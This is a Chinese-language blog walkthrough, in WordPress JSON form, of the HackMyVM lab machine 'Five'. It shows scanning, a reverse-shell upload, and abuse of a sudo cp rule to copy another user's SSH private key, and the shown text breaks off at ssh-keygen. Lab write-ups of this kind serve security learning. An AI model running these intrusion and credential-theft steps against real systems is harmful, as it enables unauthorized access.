{"id":600,"date":"2024-04-21T18:21:43","date_gmt":"2024-04-21T10:21:43","guid":{"rendered":"http:\/\/162.14.82.114\/?p=600"},"modified":"2024-04-21T18:21:43","modified_gmt":"2024-04-21T10:21:43","slug":"hmv-_-five","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/600\/04\/21\/2024\/","title":{"rendered":"hmv[-_-]Five"},"content":{"rendered":"<h1>Five<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821891.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821891.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421171829132\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821892.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821892.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421172522301\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code 
class=\"language-bash\">rustscan -a 192.168.0.188 -- -A\n\nOpen 192.168.0.188:80\n\nPORT   STATE SERVICE REASON  VERSION\n80\/tcp open  http    syn-ack nginx 1.14.2\n|_http-title: 403 Forbidden\n|_http-server-header: nginx\/1.14.2\n| http-methods: \n|_  Supported Methods: GET HEAD POST\n| http-robots.txt: 1 disallowed entry \n|_\/admin<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Five]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.188 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.188\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              jpg,txt,php,zip,bak\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/uploads              (Status: 301) [Size: 185] [--&gt; http:\/\/192.168.0.188\/uploads\/]\n\/admin                (Status: 301) [Size: 185] [--&gt; http:\/\/192.168.0.188\/admin\/]\n\/upload.php           (Status: 200) [Size: 48]\n\/robots.txt           (Status: 200) [Size: 17]\nProgress: 1323360 \/ 1323366 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Five]\n\u2514\u2500$ sudo dirsearch -u 
http:\/\/192.168.0.188 -e* -i 200,300-399 2&gt;\/dev\/null\n\n  _|. _ _  _  _  _ _|_    v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594\n\nOutput File: \/home\/kali\/temp\/Five\/reports\/http_192.168.0.188\/_24-04-21_05-31-59.txt\n\nTarget: http:\/\/192.168.0.188\/\n\n[05:31:59] Starting: \n[05:32:04] 301 -  185B  - \/admin  -&gt;  http:\/\/192.168.0.188\/admin\/\n[05:32:05] 200 -    4KB - \/admin\/\n[05:32:05] 200 -    4KB - \/admin\/index.html\n[05:32:35] 200 -   17B  - \/robots.txt\n[05:32:43] 200 -   48B  - \/upload.php\n[05:32:43] 200 -  346B  - \/upload.html\n[05:32:43] 301 -  185B  - \/uploads  -&gt;  http:\/\/192.168.0.188\/uploads\/<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821893.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821893.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421172819818\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">http:\/\/192.168.0.188\/admin\/<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821894.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821894.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421172837916\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821895.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821895.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421172851505\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">http:\/\/192.168.0.188\/robots.txt<\/code><\/pre>\n<pre><code class=\"language-text\">Disallow:\/admin<\/code><\/pre>\n<pre><code class=\"language-apl\">http:\/\/192.168.0.188\/upload.php<\/code><\/pre>\n<pre><code class=\"language-text\">Sorry, there was an error uploading your file.<\/code><\/pre>\n<pre><code class=\"language-apl\">http:\/\/192.168.0.188\/upload.html<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821896.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821896.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421173345395\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">http:\/\/192.168.0.188\/uploads\/<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821897.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821897.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421173730112\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u4e0a\u4f20\u53cd\u5f39shell<\/h3>\n<p>\u5c1d\u8bd5\u4e0a\u4f20\u53cd\u5f39shell\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821898.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821898.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421173807702\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u6fc0\u6d3b\u8fd0\u884c\uff01\u4f46\u662f\u6ca1\u6709\u4f20\u56de\u6765\uff0c\u5c1d\u8bd5\u6293\u5305\uff0c\u770b\u770b\u662f\u4e0d\u662f\u6587\u4ef6\u7c7b\u578b\u7684\u9505\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821899.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821899.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421174641256\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4e0a\u4f20\u5230<code>uploads<\/code>\u76ee\u5f55\u7684\uff0c\u5c1d\u8bd5\u4e0a\u4f20\u5230\u6839\u76ee\u5f55\u4e0a\u53bb\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821900.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821900.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421174721855\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8bd5\u8bd5\uff01<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Five]\n\u2514\u2500$ curl http:\/\/192.168.0.188\/reverseShell.php                                                 \n&lt;html&gt;\n&lt;head&gt;&lt;title&gt;404 Not Found&lt;\/title&gt;&lt;\/head&gt;\n&lt;body bgcolor=&quot;white&quot;&gt;\n&lt;center&gt;&lt;h1&gt;404 Not Found&lt;\/h1&gt;&lt;\/center&gt;\n&lt;hr&gt;&lt;center&gt;nginx\/1.14.2&lt;\/center&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<p>\u4e0d\u884c\uff0c\u76f4\u63a5\u5220\u6389\u8bd5\u8bd5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821901.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821901.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421174942607\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8fd8\u662f\u4e0d\u884c\uff0c\u8fd9\u91cc\u6211\u591a\u5220\u6389\u4e86\u4e00\u4e2a\u7a7a\u767d\u884c\u6240\u4ee5\u6ca1\u6709\u8bc6\u522b\u51fa\u6765\uff0c\u4e0d\u8981\u591a\u5220\u5c31\u884c\u4e86\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821902.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821902.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421175124455\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821903.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821903.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421175142263\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821905.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821905.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421175150926\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@five:\/$ sudo -l\nMatching Defaults entries for www-data on five:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser www-data may run the following commands on five:\n    (melisa) NOPASSWD: \/bin\/cp<\/code><\/pre>\n<p><a href=\"https:\/\/gtfobins.github.io\/gtfobins\/cp\/#sudo\">https:\/\/gtfobins.github.io\/gtfobins\/cp\/#sudo<\/a><\/p>\n<p>\u5c1d\u8bd5\u5229\u7528\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821906.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821906.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421175426669\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u6700\u540e\u4e00\u4e2a\u4e0d\u77e5\u9053\u884c\u4e0d\u884c\uff0c\u4f46\u662f\u597d\u50cf\u4e0d\u592a\u9614\u4ee5\uff0c\u5c31\u7b97\u6210\u529f\u4e86\u4e5f\u4f1a\u7834\u574f\u73af\u5883\uff0c\u5148\u4e0d\u8003\u8651\uff0c\u7ee7\u7eed\u641c\u96c6\u4e00\u4e0b\u4fe1\u606f\uff1a<\/p>\n<h3>\u590d\u5236\u79c1\u94a5<\/h3>\n<pre><code class=\"language-bash\">(remote) 
www-data@five:\/$ cd \/home\n(remote) www-data@five:\/home$ ls -la\ntotal 12\ndrwxr-xr-x  3 root   root   4096 Oct  5  2020 .\ndrwxr-xr-x 18 root   root   4096 Oct  5  2020 ..\ndrwxr-xr-x  4 melisa melisa 4096 Oct  6  2020 melisa\n(remote) www-data@five:\/home$ cd melisa\/\n(remote) www-data@five:\/home\/melisa$ ls -la\ntotal 40\ndrwxr-xr-x 4 melisa melisa 4096 Oct  6  2020 .\ndrwxr-xr-x 3 root   root   4096 Oct  5  2020 ..\n-rw------- 1 melisa melisa  100 Oct  6  2020 .Xauthority\n-rw-r--r-- 1 melisa melisa  220 Oct  5  2020 .bash_logout\n-rw-r--r-- 1 melisa melisa 3526 Oct  5  2020 .bashrc\n-rw------- 1 melisa melisa   72 Oct  5  2020 .lesshst\ndrwxr-xr-x 3 melisa melisa 4096 Oct  5  2020 .local\n-rw-r--r-- 1 melisa melisa  807 Oct  5  2020 .profile\ndrwx------ 2 melisa melisa 4096 Oct  6  2020 .ssh\n-rw------- 1 melisa melisa   14 Oct  5  2020 user.txt\n(remote) www-data@five:\/home\/melisa$ cd .ssh\nbash: cd: .ssh: Permission denied\n(remote) www-data@five:\/home\/melisa$ cd \/tmp\n(remote) www-data@five:\/tmp$ sudo -u melisa cp \/home\/melisa\/.ssh\/id_rsa \/tmp\/id_rsa\n(remote) www-data@five:\/tmp$ chmod 600 id_rsa \nchmod: changing permissions of &#039;id_rsa&#039;: Operation not permitted\n(remote) www-data@five:\/tmp$ ls -la\ntotal 36\ndrwxrwxrwt  8 root   root   4096 Apr 21 05:56 .\ndrwxr-xr-x 18 root   root   4096 Oct  5  2020 ..\ndrwxrwxrwt  2 root   root   4096 Apr 21 05:17 .ICE-unix\ndrwxrwxrwt  2 root   root   4096 Apr 21 05:17 .Test-unix\ndrwxrwxrwt  2 root   root   4096 Apr 21 05:17 .X11-unix\ndrwxrwxrwt  2 root   root   4096 Apr 21 05:17 .XIM-unix\ndrwxrwxrwt  2 root   root   4096 Apr 21 05:17 .font-unix\n-rw-------  1 melisa melisa 1811 Apr 21 05:56 id_rsa\ndrwx------  3 root   root   4096 Apr 21 05:17 systemd-private-78d8e7134f2f4ec89dc2c5815b640611-systemd-timesyncd.service-dJl3ZN\n(remote) www-data@five:\/tmp$ rm id_rsa \nrm: remove write-protected regular file &#039;id_rsa&#039;? 
y\nrm: cannot remove &#039;id_rsa&#039;: Operation not permitted\n(remote) www-data@five:\/tmp$ touch melisa\n(remote) www-data@five:\/tmp$ sudo -u melisa cp \/home\/melisa\/.ssh\/id_rsa \/tmp\/melisa\n(remote) www-data@five:\/tmp$ ls -la\ntotal 40\ndrwxrwxrwt  8 root     root     4096 Apr 21 05:57 .\ndrwxr-xr-x 18 root     root     4096 Oct  5  2020 ..\ndrwxrwxrwt  2 root     root     4096 Apr 21 05:17 .ICE-unix\ndrwxrwxrwt  2 root     root     4096 Apr 21 05:17 .Test-unix\ndrwxrwxrwt  2 root     root     4096 Apr 21 05:17 .X11-unix\ndrwxrwxrwt  2 root     root     4096 Apr 21 05:17 .XIM-unix\ndrwxrwxrwt  2 root     root     4096 Apr 21 05:17 .font-unix\n-rw-------  1 melisa   melisa   1811 Apr 21 05:56 id_rsa\n-rw-rw-rw-  1 www-data www-data 1811 Apr 21 05:57 melisa\ndrwx------  3 root     root     4096 Apr 21 05:17 systemd-private-78d8e7134f2f4ec89dc2c5815b640611-systemd-timesyncd.service-dJl3ZN\n(remote) www-data@five:\/tmp$ chmod 600 melisa\n(remote) www-data@five:\/tmp$ nc 127.0.0.1 22\n(UNKNOWN) [127.0.0.1] 22 (ssh) : Connection refused<\/code><\/pre>\n<p>\u4e0d\u53ef\u4ee5\u76f4\u63a5\u8fdb\u884c\u590d\u5236\uff0c\u56e0\u4e3a\u6267\u884c\u8005\u8fd8\u662f<code>melisa<\/code>\uff0c\u6211\u4eec\u8981\u521b\u5efa\u4e00\u4e2a\u6211\u4eec\u81ea\u5df1\u7684\u6587\u4ef6\u5145\u5f53\u5bb9\u5668\uff0c\u7136\u540e\u628a\u76ee\u6807\u653e\u8fdb\u53bb\u624d\u884c\uff01<\/p>\n<h3>\u67e5\u770b\u7aef\u53e3<\/h3>\n<p>\u7136\u540e\u5c31\u662f\u53d1\u73b0\u6ca1\u5f00\u653e<code>22<\/code>\u7aef\u53e3\uff0c\u67e5\u770b\u4e00\u4e0b\u662f\u5426\u5f00\u542f\u4e86ssh\u670d\u52a1\uff01<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@five:\/tmp$ ss -tnlup\nNetid       State        Recv-Q       Send-Q             Local Address:Port               Peer Address:Port                                             \nudp         UNCONN       0            0                        0.0.0.0:68                      0.0.0.0:*                                                \ntcp         
LISTEN       0            128                      0.0.0.0:80                      0.0.0.0:*           users:((&quot;nginx&quot;,pid=416,fd=6))       \ntcp         LISTEN       0            128                    127.0.0.1:4444                    0.0.0.0:*                                                \ntcp         LISTEN       0            128                         [::]:80                         [::]:*           users:((&quot;nginx&quot;,pid=416,fd=7))<\/code><\/pre>\n<p>\u53d1\u73b0\u5f00\u653e\u4e86<code>4444<\/code>\u7aef\u53e3\uff0c\u5c1d\u8bd5\u8fde\u63a5\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@five:\/tmp$ ssh melisa@127.0.0.1 -p 4444 -i melisa \nCould not create directory &#039;\/var\/www\/.ssh&#039;.\nThe authenticity of host &#039;[127.0.0.1]:4444 ([127.0.0.1]:4444)&#039; can&#039;t be established.\nECDSA key fingerprint is SHA256:jWQpYhXQJtOuJfrNjZvNSilLDT7fkbFxeioQzGTBY7Y.\nAre you sure you want to continue connecting (yes\/no)? yes\nFailed to add the host to the list of known hosts (\/var\/www\/.ssh\/known_hosts).\nmelisa@127.0.0.1&#039;s password: <\/code><\/pre>\n<h3>\u751f\u6210\u9ed8\u8ba4\u516c\u94a5<\/h3>\n<p>\u8bf4\u660e\u786e\u5b9e\u5f00\u653e\u4e86\u76f8\u5173\u7aef\u53e3\uff0c\u4f46\u662f\u6ca1\u6709<code>authorized_keys<\/code>\uff0c\u751f\u6210\u4e00\u4e2acp\u8fdb\u53bb\uff01<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@five:\/tmp$ ssh-keygen 